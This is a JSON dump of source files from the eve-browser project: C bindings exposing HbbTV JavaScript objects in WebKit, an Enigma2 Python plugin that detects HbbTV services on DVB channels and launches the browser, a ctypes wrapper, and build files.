[ { "alpha_fraction": 0.6842105388641357, "alphanum_fraction": 0.6842105388641357, "avg_line_length": 24.33333396911621, "blob_id": "ef7c8e039abb423c3b5bfc690945d656b306249b", "content_id": "9f022ab84d84166adb07c06015d16a96a772cd2e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 76, "license_type": "no_license", "max_line_length": 51, "num_lines": 3, "path": "/README.md", "repo_name": "popazerty/eve-browser", "src_encoding": "UTF-8", "text": "eve-browser\n===========\nEve Browser is a browser designed for set top boxes\n" }, { "alpha_fraction": 0.6781273484230042, "alphanum_fraction": 0.6806309223175049, "avg_line_length": 30.04145050048828, "blob_id": "3546eac30c74412f725f2ff23897df403d0128ac", "content_id": "1ac6778d0045d7fbd2bbd295bbc07b492354e099", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 11983, "license_type": "no_license", "max_line_length": 131, "num_lines": 386, "path": "/js_extension.c", "repo_name": "popazerty/eve-browser", "src_encoding": "UTF-8", "text": "/** \nThis file contains the js <-> c bindings \n**/\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <sys/stat.h>\n#include <string.h>\n\n#ifdef GTK\n#include <webkit/webkit.h>\n#endif\n#ifdef DFB\n#include <webkit/webkitdfb.h>\n#include <glib.h>\n#include <webkit/webview.h>\n#endif\n\n#include <JavaScriptCore/JavaScript.h>\n\n#include \"js_debug.h\"\n\nstatic int (*g_Callback)(int type) = NULL;\n\n/******************************************/\n\n#ifdef DFB\nvoid webkit_web_view_execute_script(LiteWebView* web_view, char* script)\n{\n lite_webview_execute_script(web_view, script);\n}\n#endif\n\n// Registering single funxtions\n#ifdef GTK\nvoid register_javascript_function(WebKitWebView* web_view, const char *name, JSObjectCallAsFunctionCallback callback)\n#endif\n#ifdef DFB\nvoid register_javascript_function(LiteWebView* web_view, const char *name, JSObjectCallAsFunctionCallback callback)\n#endif\n{\n#ifdef GTK\n WebKitWebFrame *frame = webkit_web_view_get_main_frame(WEBKIT_WEB_VIEW(web_view));\n JSContextRef ctx = webkit_web_frame_get_global_context(frame);\n#endif\n#ifdef DFB\n JSContextRef ctx = lite_webview_get_global_context(web_view);\n#endif\n JSObjectRef global = JSContextGetGlobalObject(ctx);\n JSObjectRef func = JSObjectMakeFunctionWithCallback(ctx, NULL, callback);\n JSStringRef jsname = JSStringCreateWithUTF8CString(name);\n JSObjectSetProperty(ctx, global, jsname, func,0, NULL);\n JSStringRelease(jsname);\n}\n\n\n/******************************************/\n\nchar s_o_ApplicationManager[] = \n\"function ApplicationManager() {\\\n}\";\n\n\nchar s_o_getOwnerApplication[] = \n\"HTMLObjectElement.prototype.getOwnerApplication = function(document) {\\\n c_o_getOwnerApplication(document); \\\n return new ApplicationManager(); \\\n}\";\n\nJSValueRef\nc_o_getOwnerApplication (JSContextRef ctx, JSObjectRef function, JSObjectRef thisObject, \n size_t argumentCount, const JSValueRef arguments[], JSValueRef *exception)\n{\n printf(\"%s - CALLED (argumentCount=%d)\\n\", __func__, argumentCount);\n\n for(unsigned int i = 0; i < argumentCount; i++)\n {\n printJSValueRef(ctx, arguments[i], exception);\n }\n\n return NULL;\n}\n\n\nchar s_o_ApplicationManager_createApplication[] = \n\"ApplicationManager.prototype.createApplication = function(url, unknown) {\\\n window.location.href = url; \\\n c_o_ApplicationManager_createApplication(url, unknown); \\\n return true; 
\\\n}\";\n\nJSValueRef\nc_o_ApplicationManager_createApplication (JSContextRef ctx, JSObjectRef function, JSObjectRef thisObject, \n size_t argumentCount, const JSValueRef arguments[], JSValueRef *exception)\n{\n printf(\"%s - CALLED (argumentCount=%d)\\n\", __func__, argumentCount);\n\n for(unsigned int i = 0; i < argumentCount; i++)\n {\n printJSValueRef(ctx, arguments[i], exception);\n }\n\n return NULL;\n}\n\nchar s_o_ApplicationManager_destroyApplication[] = \n\"ApplicationManager.prototype.destroyApplication = function() {\\\n c_o_ApplicationManager_destroyApplication(); \\\n return true; \\\n}\";\n\nJSValueRef\nc_o_ApplicationManager_destroyApplication (JSContextRef ctx, JSObjectRef function, JSObjectRef thisObject, \n size_t argumentCount, const JSValueRef arguments[], JSValueRef *exception)\n{\n printf(\"%s - CALLED (argumentCount=%d)\\n\", __func__, argumentCount);\n\n for(unsigned int i = 0; i < argumentCount; i++)\n {\n printJSValueRef(ctx, arguments[i], exception);\n }\n\n return NULL;\n}\n\nchar s_o_ApplicationManager_show[] = \n\"ApplicationManager.prototype.show = function() {\\\n c_o_ApplicationManager_show(); \\\n return true; \\\n}\";\n\nJSValueRef\nc_o_ApplicationManager_show (JSContextRef ctx, JSObjectRef function, JSObjectRef thisObject, \n size_t argumentCount, const JSValueRef arguments[], JSValueRef *exception)\n{\n printf(\"%s - CALLED (argumentCount=%d)\\n\", __func__, argumentCount);\n\n for(unsigned int i = 0; i < argumentCount; i++)\n {\n printJSValueRef(ctx, arguments[i], exception);\n }\n\n return NULL;\n}\n\nchar s_o_ApplicationManager_hide[] = \n\"ApplicationManager.prototype.hide = function() {\\\n c_o_ApplicationManager_hide(); \\\n return true; \\\n}\";\n\nJSValueRef\nc_o_ApplicationManager_hide (JSContextRef ctx, JSObjectRef function, JSObjectRef thisObject, \n size_t argumentCount, const JSValueRef arguments[], JSValueRef *exception)\n{\n printf(\"%s - CALLED (argumentCount=%d)\\n\", __func__, argumentCount);\n\n for(unsigned int i = 0; i < argumentCount; i++)\n {\n printJSValueRef(ctx, arguments[i], exception);\n }\n\n return NULL;\n}\n\n// HTMLObjectElement - Bindings\n// Visibility setting is a workaround to get video object invisible \nchar s_o_bindToCurrentChannel[] = \n \"HTMLObjectElement.prototype.bindToCurrentChannel = function() { \\\n c_o_bindToCurrentChannel(); \\\n document.getElementById(\\\"video\\\").style.visibility = \\\"hidden\\\"; \\\n}\";\n\nJSValueRef\nc_o_bindToCurrentChannel (JSContextRef ctx, JSObjectRef function, JSObjectRef thisObject, \n size_t argumentCount, const JSValueRef arguments[], JSValueRef *exception)\n{\n printf(\"%s - CALLED (argumentCount=%d)\\n\", __func__, argumentCount);\n\n for(unsigned int i = 0; i < argumentCount; i++)\n {\n printJSValueRef(ctx, arguments[i], exception);\n }\n\n if(g_Callback != NULL)\n g_Callback(100);\n\n return NULL;\n}\n\nchar s_o_getChannelConfig[] = \n\"HTMLObjectElement.prototype.getChannelConfig = function() {\\\n c_o_getChannelConfig(); \\\n\treturn new Channel();\\\n}\";\n\nJSValueRef\nc_o_getChannelConfig (JSContextRef ctx, JSObjectRef function, JSObjectRef thisObject, \n size_t argumentCount, const JSValueRef arguments[], JSValueRef *exception)\n{\n printf(\"%s - CALLED\\n\", __func__);\n return NULL;\n}\n\nchar s_o_play[] = \n\"HTMLObjectElement.prototype.play = function(speed) {\\\n c_o_play(speed, this.data); \\\n}\";\n\nJSValueRef\nc_o_play (JSContextRef ctx, JSObjectRef function, JSObjectRef thisObject, \n size_t argumentCount, const JSValueRef arguments[], JSValueRef 
*exception)\n{\n printf(\"%s - CALLED (argumentCount=%d)\\n\", __func__, argumentCount);\n\n /*for(unsigned int i = 0; i < argumentCount; i++)\n {\n printJSValueRef(ctx, arguments[i], exception);\n }*/\n\n if(argumentCount == 2) {\n float speed = JSValueToNumber(ctx, arguments[0], exception);\n char * url = NULL;\n int urlLen = JSValueToString(ctx, arguments[1], exception, &url);\n if(urlLen > 0) {\n char urlZdfBad[] = \"http://www.metafilegenerator.de/ondemand/zdf/hbbtv/geoloc_zdf-none/\";\n if(!strncmp(url, urlZdfBad, strlen(urlZdfBad)))\n {\n char urlZdf[] = \"mms://ondemand.msmedia.zdf.newmedia.nacamar.net/zdf/data/msmedia/zdf/\";\n int urlFixedLen = strlen(urlZdf) + strlen(url) - strlen(urlZdfBad);\n char urlFixed[urlFixedLen];\n strncpy(urlFixed, urlZdf, strlen(urlZdf));\n strncpy(urlFixed + strlen(urlZdf), url + strlen(urlZdfBad), strlen(url) - strlen(urlZdfBad));\n\n free(url);\n url = (char*)malloc(sizeof(char) * (urlFixedLen+2));\n strncpy(url, urlFixed, urlFixedLen);\n url[urlFixedLen - 3] = 'w';\n url[urlFixedLen - 2] = 'm';\n url[urlFixedLen - 1] = 'v';\n url[urlFixedLen] = '\\0';\n url[urlFixedLen+1] = '\\0'; // bug in libeplayer3 for mms\n }\n printf(\"%s:%s[%d] speed=%f url=%s [%d]\\n\", __FILE__, __func__, __LINE__, speed, url, urlLen);\n }\n }\n\n return NULL;\n}\n\nchar s_o_stop[] = \n\"HTMLObjectElement.prototype.stop = function() {\\\n c_o_stop(); \\\n}\";\n\nJSValueRef\nc_o_stop (JSContextRef ctx, JSObjectRef function, JSObjectRef thisObject, \n size_t argumentCount, const JSValueRef arguments[], JSValueRef *exception)\n{\n printf(\"%s - CALLED (argumentCount=%d)\\n\", __func__, argumentCount);\n\n for(unsigned int i = 0; i < argumentCount; i++)\n {\n printJSValueRef(ctx, arguments[i], exception);\n }\n\n return NULL;\n}\n\nchar s_o_release[] = \n\"HTMLObjectElement.prototype.release = function() {\\\n c_o_release(); \\\n}\";\n\nJSValueRef\nc_o_release (JSContextRef ctx, JSObjectRef function, JSObjectRef thisObject, \n size_t argumentCount, const JSValueRef arguments[], JSValueRef *exception)\n{\n printf(\"%s - CALLED (argumentCount=%d)\\n\", __func__, argumentCount);\n\n for(unsigned int i = 0; i < argumentCount; i++)\n {\n printJSValueRef(ctx, arguments[i], exception);\n }\n\n return NULL;\n}\n\nchar s_o_setFullScreen[] = \n\"HTMLObjectElement.prototype.setFullScreen = function(show) {\\\n c_o_setFullScreen(show); \\\n}\";\n\nJSValueRef\nc_o_setFullScreen (JSContextRef ctx, JSObjectRef function, JSObjectRef thisObject, \n size_t argumentCount, const JSValueRef arguments[], JSValueRef *exception)\n{\n printf(\"%s - CALLED (argumentCount=%d)\\n\", __func__, argumentCount);\n\n for(unsigned int i = 0; i < argumentCount; i++)\n {\n printJSValueRef(ctx, arguments[i], exception);\n }\n\n return NULL;\n}\n\nchar s_o_seek[] = \n\"HTMLObjectElement.prototype.seek = function(millis) {\\\n c_o_seek(millis); \\\n}\";\n\nJSValueRef\nc_o_seek (JSContextRef ctx, JSObjectRef function, JSObjectRef thisObject, \n size_t argumentCount, const JSValueRef arguments[], JSValueRef *exception)\n{\n printf(\"%s - CALLED (argumentCount=%d)\\n\", __func__, argumentCount);\n\n for(unsigned int i = 0; i < argumentCount; i++)\n {\n printJSValueRef(ctx, arguments[i], exception);\n }\n\n return NULL;\n}\n\n///////////////////////////////////77\n\n#ifdef GTK\nvoid registerJsFunctions(WebKitWebView* web_view, int (*fnc)(int type))\n#endif\n#ifdef DFB\nvoid registerJsFunctions(LiteWebView* web_view, int (*fnc)(int type))\n#endif\n{\n g_Callback = fnc;\n\n webkit_web_view_execute_script(web_view, 
s_o_getOwnerApplication);\n register_javascript_function(web_view, \"c_o_getOwnerApplication\", c_o_getOwnerApplication);\n\n webkit_web_view_execute_script(web_view, s_o_ApplicationManager);\n //register_javascript_function(web_view, \"c_o_ApplicationManager\", c_o_ApplicationManager);\n\n webkit_web_view_execute_script(web_view, s_o_ApplicationManager_createApplication);\n register_javascript_function(web_view, \"c_o_ApplicationManager_createApplication\", c_o_ApplicationManager_createApplication);\n\n webkit_web_view_execute_script(web_view, s_o_ApplicationManager_destroyApplication);\n register_javascript_function(web_view, \"c_o_ApplicationManager_destroyApplication\", c_o_ApplicationManager_destroyApplication);\n\n webkit_web_view_execute_script(web_view, s_o_ApplicationManager_show);\n register_javascript_function(web_view, \"c_o_ApplicationManager_show\", c_o_ApplicationManager_show);\n\n webkit_web_view_execute_script(web_view, s_o_ApplicationManager_hide);\n register_javascript_function(web_view, \"c_o_ApplicationManager_hide\", c_o_ApplicationManager_hide);\n\n webkit_web_view_execute_script(web_view, s_o_bindToCurrentChannel);\n register_javascript_function(web_view, \"c_o_bindToCurrentChannel\", c_o_bindToCurrentChannel);\n\n webkit_web_view_execute_script(web_view, s_o_play);\n register_javascript_function(web_view, \"c_o_play\", c_o_play);\n\n webkit_web_view_execute_script(web_view, s_o_stop);\n register_javascript_function(web_view, \"c_o_stop\", c_o_stop);\n\n webkit_web_view_execute_script(web_view, s_o_release);\n register_javascript_function(web_view, \"c_o_release\", c_o_release);\n\n webkit_web_view_execute_script(web_view, s_o_setFullScreen);\n register_javascript_function(web_view, \"c_o_setFullScreen\", c_o_setFullScreen);\n\n webkit_web_view_execute_script(web_view, s_o_seek);\n register_javascript_function(web_view, \"c_o_seek\", c_o_seek);\n\n}\n\n// This function can be used to force displaying hbbtvlib errors\n#ifdef GTK\nvoid registerSpecialJsFunctions(WebKitWebView* web_view)\n#endif\n#ifdef DFB\nvoid registerSpecialJsFunctions(LiteWebView* web_view)\n#endif\n{\n char scriptError[] = \"alert(hbbtvlib_lastError);\";\n webkit_web_view_execute_script(web_view, scriptError);\n}\n\n" }, { "alpha_fraction": 0.6226657032966614, "alphanum_fraction": 0.6370634436607361, "avg_line_length": 26.632652282714844, "blob_id": "b6121d8d1302a247a14952240c00d51382b2af66", "content_id": "05c7c921bb22fcc9c187507547934c463fa377fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7015, "license_type": "no_license", "max_line_length": 148, "num_lines": 245, "path": "/enigma2/HbbTv/plugin.py", "repo_name": "popazerty/eve-browser", "src_encoding": "UTF-8", "text": "from enigma import fbClass, eServiceReference, eTimer, iServiceInformation, getDesktop\r\nfrom Plugins.Plugin import PluginDescriptor\r\nimport subprocess\r\nfrom Tools.Directories import resolveFilename, SCOPE_PLUGINS\r\nfrom Screens.Screen import Screen\r\nfrom Components.ActionMap import ActionMap\r\nimport sys\r\nfrom iEveBrowser import iEveBrowser\r\n\r\ngUrl = \"\"\r\n\r\n###\r\n# This Screen is only active if the browser is fullscreen\r\nclass EveBrowser(Screen):\r\n # Pseudo Screen\r\n skin = \"\"\"<screen name=\"EveBrowser\" position=\"0,0\" zPosition=\"10\" size=\"1,1\" backgroundColor=\"transparent\" title=\"EveBrowser\" flags=\"wfNoBorder\">\r\n </screen>\r\n \"\"\"\r\n def __init__(self, session, url):\r\n Screen.__init__(self, session)\r\n \r\n 
#fbClass.getInstance().lock()\r\n \r\n self.eveBrowser = iEveBrowser()\r\n print \"a\"\r\n dSize = getDesktop(0).size()\r\n self.eveBrowser.setDimension(1280, 720)\r\n #self.eveBrowser.setDimension(dSize.width(), dSize.height())\r\n print \"b\"\r\n #self.eveBrowser.loadEveBrowser()\r\n print \"c\"\r\n if len(url) == 0:\r\n url = \"http://tv-html.irt.de/hbbtv/interop05/index.php\" #\"http://tv-html.irt.de/hbbtv/tests/\" #\"http://itv.ard.de/ardtext/\"\r\n self.eveBrowser.loadPage(url)\r\n print \"d\"\r\n #TODO: Add addionional keys for routing to browser\r\n self[\"eveBrowserActions\"] = ActionMap([\"OkCancelActions\", \"ColorActions\", \"DirectionActions\", \"NumberActions\"],\r\n {\r\n \"red\": self.keyRed,\r\n \"green\": self.keyGreen,\r\n \"yellow\": self.keyYellow,\r\n \"blue\": self.keyBlue,\r\n \"up\": self.keyUp,\r\n \"down\": self.keyDown,\r\n \"left\": self.keyLeft,\r\n \"right\": self.keyRight,\r\n \"ok\": self.keyOk,\r\n \"cancel\": self.keyCancel,\r\n \"1\": self.key1,\r\n \"2\": self.key2,\r\n \"3\": self.key3,\r\n \"4\": self.key4,\r\n \"5\": self.key5,\r\n \"6\": self.key6,\r\n \"7\": self.key7,\r\n \"8\": self.key8,\r\n \"9\": self.key9,\r\n \"0\": self.key0,\r\n }, -2)\r\n \r\n\r\n def show(self):\r\n self.eveBrowser.show()\r\n \r\n def keyCancel(self):\r\n self.eveBrowser.unloadEveBrowser()\r\n self.close()\r\n \r\n def keyRed(self):\r\n self.keyPressed(\"red\")\r\n \r\n def keyGreen(self):\r\n self.keyPressed(\"green\")\r\n \r\n def keyYellow(self):\r\n self.keyPressed(\"yellow\")\r\n \r\n def keyBlue(self):\r\n self.keyPressed(\"blue\")\r\n \r\n def keyOk(self):\r\n self.keyPressed(\"ok\")\r\n \r\n def keyUp(self):\r\n self.keyPressed(\"up\")\r\n \r\n def keyDown(self):\r\n self.keyPressed(\"down\")\r\n \r\n def keyLeft(self):\r\n self.keyPressed(\"left\")\r\n \r\n def keyRight(self):\r\n self.keyPressed(\"right\")\r\n \r\n def key1(self):\r\n self.keyPressed(\"1\")\r\n \r\n def key2(self):\r\n self.keyPressed(\"2\")\r\n \r\n def key3(self):\r\n self.keyPressed(\"3\")\r\n \r\n def key4(self):\r\n self.keyPressed(\"4\")\r\n \r\n def key5(self):\r\n self.keyPressed(\"5\")\r\n \r\n def key6(self):\r\n self.keyPressed(\"6\")\r\n \r\n def key7(self):\r\n self.keyPressed(\"7\")\r\n \r\n def key8(self):\r\n self.keyPressed(\"8\")\r\n \r\n def key9(self):\r\n self.keyPressed(\"9\")\r\n \r\n def key0(self):\r\n self.keyPressed(\"0\")\r\n \r\n def keyPressed(self, key):\r\n self.eveBrowser.keyPress(key, self.eveBrowser.KEY_TYPE_PRESS)\r\n self.eveBrowser.keyPress(key, self.eveBrowser.KEY_TYPE_RELEASE)\r\n\r\n###\r\n# This Screen displays the RED Button\r\nclass REDButton(Screen):\r\n\tskin = \"\"\"<screen name=\"REDButton\" position=\"50,50\" zPosition=\"10\" size=\"34,45\" backgroundColor=\"transparent\" title=\"REDButton\" flags=\"wfNoBorder\">\r\n\t\t<eLabel position=\"0,0\" size=\"34,45\" backgroundColor=\"#FF0000\" />\r\n\t</screen>\r\n\t\"\"\"\r\n\r\n\tdef __init__(self, session, url):\r\n\t\tScreen.__init__(self, session)\r\n\t\tself.session = session\r\n\t\tself.url = url\r\n\t\t\r\n\t\tself[\"redButtonActions\"] = ActionMap([\"SetupActions\", \"ColorActions\"],\r\n\t\t{\r\n\t\t\t\"red\": self.keyRed,\r\n\t\t\t#\"cancel\": self.close,\r\n\t\t}, -2)\r\n\t\r\n\tdef keyRed(self):\r\n\t\tself.session.open(EveBrowser, self.url)\r\n\r\nclass HbbTv():\r\n\t\r\n\tpid = \"\"\r\n\t\r\n\tdef __init__(self, session):\r\n\t\tself.session = session\r\n\t\t\r\n\t\t# This is a hack, instead we should register to the channel changed event\r\n\t\tself.poll_timer = 
eTimer()\r\n\t\tself.poll_timer.callback.append(self.__eventInfoChanged)\r\n\t\r\n\tdef __eventInfoChanged(self):\r\n\t\tif self.session is not None and self.session.nav is not None:\r\n\t\t\tfrom enigma import eServiceCenter\r\n\t\t\tserviceHandler = eServiceCenter.getInstance()\r\n\t\t\tref = self.session.nav.getCurrentService()\r\n\t\t\tif ref is not None:\r\n\t\t\t\td = ref.stream().getStreamingData()\r\n\t\t\t\tdemux = 0\r\n\t\t\t\tif d.has_key(\"demux\"):\r\n\t\t\t\t\tdemux = d[\"demux\"]\r\n\t\t\t\tif d.has_key(\"pids\"):\r\n\t\t\t\t\tfor pid in d[\"pids\"]:\r\n\t\t\t\t\t\tif pid is not None and len(pid) == 2 and pid[1] == \"pmt\":\r\n\t\t\t\t\t\t\tprint pid[0]\r\n\t\t\t\t\t\t\tif self.pid != pid[0]:\r\n\t\t\t\t\t\t\t\tself.pid = pid[0]\r\n\t\t\t\t\t\t\t\tself.checkForHbbTVService(demux, pid[0])\r\n\t\t\t\t\t\t\t\treturn\r\n\t\r\n\tdef checkForHbbTVService(self, demux, pmtPid):\r\n\t\tp = subprocess.Popen((resolveFilename(SCOPE_PLUGINS) + \"/SystemPlugins/HbbTv/bin/hbbtvscan-sh4\", \r\n\t\t\t\"-p\", str(pmtPid), \"-d\", \"/dev/dvb/adapter0/demux\" + str(demux)), stdout=subprocess.PIPE)\r\n\t\tout = p.communicate()[0]\r\n\t\tfor line in out.split(\"\\n\"):\r\n\t\t\tif line.startswith(\"URL\"):\r\n\t\t\t\telements = line.split(\"\\\"\")\r\n\t\t\t\turl = elements[1]\r\n\t\t\t\tprint url\r\n\t\t\t\ttype = elements[5]\r\n\t\t\t\tif type == \"AUTOSTART\":\r\n\t\t\t\t\t# Here we have to think about what we want \r\n\t\t\t\t\t# Either we load pages always in backgroudn so that hbbtv pages are displayed shortly after red button press\r\n\t\t\t\t\t# and that the red button option is only displayed after fully loading a page\r\n\t\t\t\t\t# Or we only start the browser after a user has pressed the red button \r\n\t\t\t\t\t# this would be wy more memory efficiant as tha browser doesnt have to \r\n\t\t\t\t\t# run always, but the first page will be displayed slower\r\n\t\t\t\t\t\r\n\t\t\t\t\t#self.session.open(EveBrowser, url)\r\n\t\t\t\t\t\r\n\t\t\t\t\t# For the moment the 2nd aproach seems to be a better solution\r\n\t\t\t\t\t#self.displayREDButton(url)\r\n\t\t\t\t\tglobal gUrl\r\n\t\t\t\t\tgUrl = url\r\n\t\t\t\t\t\r\n\t\t\t\t\treturn\r\n\t\r\n\tdef start(self, session):\r\n\t\tself.session = session\r\n\t\t#self.session.open(EveBrowser, \"http://www.google.de\")\r\n\t\t#self.displayREDButton(\"http://itv.ard.de/ardtext/\")\r\n\t\tself.poll_timer.start(5000)\r\n\t\r\n\tdef displayREDButton(self, url):\r\n\t\tself.session.open(REDButton, url)\r\n\r\nglobal_session = None\r\nglobal_hbbtv = None\r\n\r\ndef autostart(reason, **kwargs):\r\n\tprint \"B\"*60\r\n\tglobal global_session\r\n\tglobal global_hbbtv\r\n\tif reason == 0:\r\n\t\tprint \"starting hbbtv\"\r\n\t\tglobal_hbbtv = HbbTv(global_session)\r\n\r\ndef sessionstart(reason, session):\r\n\tprint \"A\"*60\r\n\tglobal global_session\r\n\tglobal global_hbbtv\r\n\tglobal_session = session\r\n\tglobal_hbbtv.start(global_session)\r\n\r\ndef main(session, **kwargs):\r\n\tglobal gUrl\r\n\tsession.open(EveBrowser, gUrl)\r\n\r\ndef Plugins(**kwargs):\r\n\treturn [\r\n\t\tPluginDescriptor(name=\"HbbTv\", description=\"HbbTv\", where = PluginDescriptor.WHERE_EXTENSIONSMENU, fnc=main),\r\n\t\tPluginDescriptor(name = \"HbbTv\", description = \"HbbTv\", where = PluginDescriptor.WHERE_AUTOSTART, fnc = autostart),\r\n\t\tPluginDescriptor(where = PluginDescriptor.WHERE_SESSIONSTART, fnc = sessionstart)\r\n\t]\r\n" }, { "alpha_fraction": 0.5468991994857788, "alphanum_fraction": 0.567054271697998, "avg_line_length": 32.0512809753418, "blob_id": 
"0d7b4d7bb0fc8e5841bb4cc6c0dc0a679668c830", "content_id": "974660c388f5a3c11b209baafa5f2c21a8773bed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 2580, "license_type": "no_license", "max_line_length": 112, "num_lines": 78, "path": "/css_extension.c", "repo_name": "popazerty/eve-browser", "src_encoding": "UTF-8", "text": "\n#include <stdio.h>\n#include <stdlib.h>\n#include <sys/stat.h>\n#include <string.h>\n\n#include <webkit/webkit.h>\n#include <JavaScriptCore/JavaScript.h>\n\nvoid addLinkHighlighting(WebKitWebView* web_view) {\n\n // Well this is here a mess cause I tried different approaches to enable link higlighting\n // Each one has flaws up to performace drain.\n\n /*\n char scriptBackgroundColor[] = \"document.styleSheets[0].insertRule(\\'a{backgroundColor=\\\"#FF0000\\\";}\\',0);\";\n */\n\n /*\n char scriptBackgroundColor[] = \"var cssTags = document.getElementsByTagName(\\\"style\\\"); \\\n var cssTag = cssTags[0]; \\\n alert(cssTag.innerText); \\\n cssTag.innerText += \\'a { backgroundColor = \\\"#FF0000\\\"; }\\'; \\\n alert(cssTag.innerText);\";\n */\n\n /*\n char scriptBackgroundColor[] = \"var cssTag = document.createElement(\\\"style\\\"); \\\n cssTag.type = \\\"text/css\\\"; \\\n cssTag.innerHtml = \\'a { backgroundColor = \\\"#FF0000\\\"; }\\'; \\\n document.getElementsByTagName(\\\"head\\\")[0].appendChild(cssTag);\";\n */\n \n \n // cssTag.getElementsByTagName.innerHtml = \\'a { backgroundColor = \\\"#FF0000\\\" }\\';\n\n /*\n char scriptBackgroundColor[] = \"var a = document.getElementsByTagName(\\\"a\\\"); \\\n for(var i=0;i<a.length;i++){ \\\n a[i].style.backgroundColor = \\\"#FFA4A4\\\"; \\\n a[i].style.border = \\\"#FF0000 solid medium\\\"; \\\n a[i].style.borderRadius = \\\"15px\\\"; \\\n }\";\n */\n\n //webkit_web_view_execute_script(web_view, scriptBackgroundColor);\n\n //--------------------------\n\n /*\n char scriptHover[] = \"var cssTag = document.createElement(\\\"style\\\"); \\\n cssTag.setAttribute(\\\"type\\\",\\\"text/css\\\"); \\\n cssTag.innerHtml = \\'a:focus { backgroundColor = \\\"#00FF00\\\" }\\'; \\\n document.body.appendChild(cssTag);\";\n */\n\n /*\n char scriptHover[] = \"var a = document.getElementsByTagName(\\\"*\\\"); \\\n for(var i=0;i<a.length;i++) { \\\n a[i].onfocus = function() { \\\n this.style.backgroundColor= \\\"#87FF87\\\"; \\\n this.style.border = \\\"#00FF00 solid medium\\\"; \\\n this.style.borderRadius = \\\"15px\\\"; \\\n }; \\\n\t\t\t a[i].onblur = function() { \\\n this.style.backgroundColor= \\\"#FFA4A4\\\"; \\\n this.style.border = \\\"#FF0000 solid medium\\\"; \\\n this.style.borderRadius = \\\"15px\\\"; \\\n }; \\\n }\";\n */\n \n //webkit_web_view_execute_script(web_view, scriptHover);\n}\n\nvoid registerCssExtension(WebKitWebView* web_view)\n{\n addLinkHighlighting(web_view);\n}\n\n" }, { "alpha_fraction": 0.7117794752120972, "alphanum_fraction": 0.7218044996261597, "avg_line_length": 55.28571319580078, "blob_id": "ea762f7f0970f05fa142cd7a4430a9187206fafe", "content_id": "e7b8264094663131b693dd894c305ddac470d24c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 399, "license_type": "no_license", "max_line_length": 107, "num_lines": 7, "path": "/Makefile.am", "repo_name": "popazerty/eve-browser", "src_encoding": "UTF-8", "text": "lib_LTLIBRARIES = libevebrowser.la\n\nlibevebrowser_la_SOURCES = main.c js_extension.c js_debug.c\n\nlibevebrowser_la_CFLAGS = -std=c99 -DDFB $(FUSION_CFLAGS) $(PNG_CFLAGS) 
$(WEBKIT_CFLAGS) $(DFBINT_CFLAGS)\nlibevebrowser_la_CXXFLAGS = -std=c99 -DDFB $(FUSION_CFLAGS) $(PNG_CFLAGS) $(WEBKIT_CFLAGS) $(DFBINT_CFLAGS)\nlibevebrowser_la_LIBADD = $(FUSION_LIBS) $(PNG_LIBS) $(WEBKIT_LIBS) $(DFBINT_LIBS)\n\n\n\n\n\n" }, { "alpha_fraction": 0.6243036985397339, "alphanum_fraction": 0.6323499083518982, "avg_line_length": 27.198795318603516, "blob_id": "4a4b7613079903b76c9cd02e3345c715529d510a", "content_id": "9274d06a34761c117af0e104656b120d259ab40e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4847, "license_type": "no_license", "max_line_length": 124, "num_lines": 166, "path": "/enigma2/HbbTv/iEveBrowser.py", "repo_name": "popazerty/eve-browser", "src_encoding": "UTF-8", "text": "#killall rcS; killall enigma2; mount -tvfat /dev/sda1 /root; export LD_LIBRARY_PATH=/root/dfb2/lib:$LD_LIBRARY_PATH; enigma2\r\n\r\nimport os\r\nimport subprocess\r\nimport sys\r\nfrom Tools.Directories import resolveFilename, SCOPE_PLUGINS\r\n\r\nctypes = None\r\ntry:\r\n print \"Loading ctypes\"\r\n ctypes = __import__(\"_ctypes\")\r\n print \"Loading ctypes - Done\"\r\nexcept Exception, ex:\r\n print \"Loading ctypes - Failed (%s)\" % ex\r\n ctypes = None\r\n\r\nclass c_int(ctypes._SimpleCData):\r\n _type_ = \"i\"\r\n\r\nclass CFunctionType(ctypes.CFuncPtr):\r\n _argtypes_ = (c_int, )\r\n _restype_ = c_int\r\n _flags_ = ctypes.FUNCFLAG_CDECL\r\n\r\ngIEveBrowser = None\r\n\r\ndef _iEveBrowser__evtInfo(type):\r\n print \"_iEveBrowser__evtInfo:\", type\r\n if gIEveBrowser is not None:\r\n gIEveBrowser._evtInfo(type)\r\n return 0\r\n\r\n\r\n\r\nclass iEveBrowser():\r\n \r\n eveBrowser = None\r\n evtInfo = None\r\n \r\n def __init__(self):\r\n #os.system('export DFBARGS=\"pixelformat=ARGB,no-cursor,bg-none')\r\n os.environ[\"DFBARGS\"] = \"pixelformat=ARGB,no-cursor,bg-none,no-linux-input-grab,no-vt\"\r\n \r\n \r\n try:\r\n print \"Loading libevebrowser.so.0.0.0\"\r\n lib = resolveFilename(SCOPE_PLUGINS) + \"/SystemPlugins/HbbTv/lib/libevebrowser.so.0.0.0\"\r\n self.eveBrowser = ctypes.dlopen(lib, ctypes.RTLD_GLOBAL)\r\n print \"Loading libevebrowser.so.0.0.0 - Done\"\r\n except Exception, ex:\r\n print \"Loading libevebrowser.so.0.0.0 - Failed (%s)\" % ex\r\n try:\r\n print \"Loading libevebrowser.so.0.0.0\"\r\n lib = \"/usr/lib/libevebrowser.so.0.0.0\"\r\n self.eveBrowser = ctypes.dlopen(lib, ctypes.RTLD_GLOBAL)\r\n print \"Loading libevebrowser.so.0.0.0 - Done\"\r\n except Exception, ex:\r\n print \"Loading libevebrowser.so.0.0.0 - Failed (%s)\" % ex\r\n return\r\n \r\n try:\r\n print \"Registering functions\"\r\n self._setDimension = ctypes.dlsym(self.eveBrowser, \"setDimension\")\r\n self._loadEveBrowser = ctypes.dlsym(self.eveBrowser, \"loadEveBrowser\")\r\n self._unloadEveBrowser = ctypes.dlsym(self.eveBrowser, \"unloadEveBrowser\")\r\n self._loadPage = ctypes.dlsym(self.eveBrowser, \"loadPage\")\r\n self._show = ctypes.dlsym(self.eveBrowser, \"show\")\r\n self._hide = ctypes.dlsym(self.eveBrowser, \"hide\")\r\n self._keyPress = 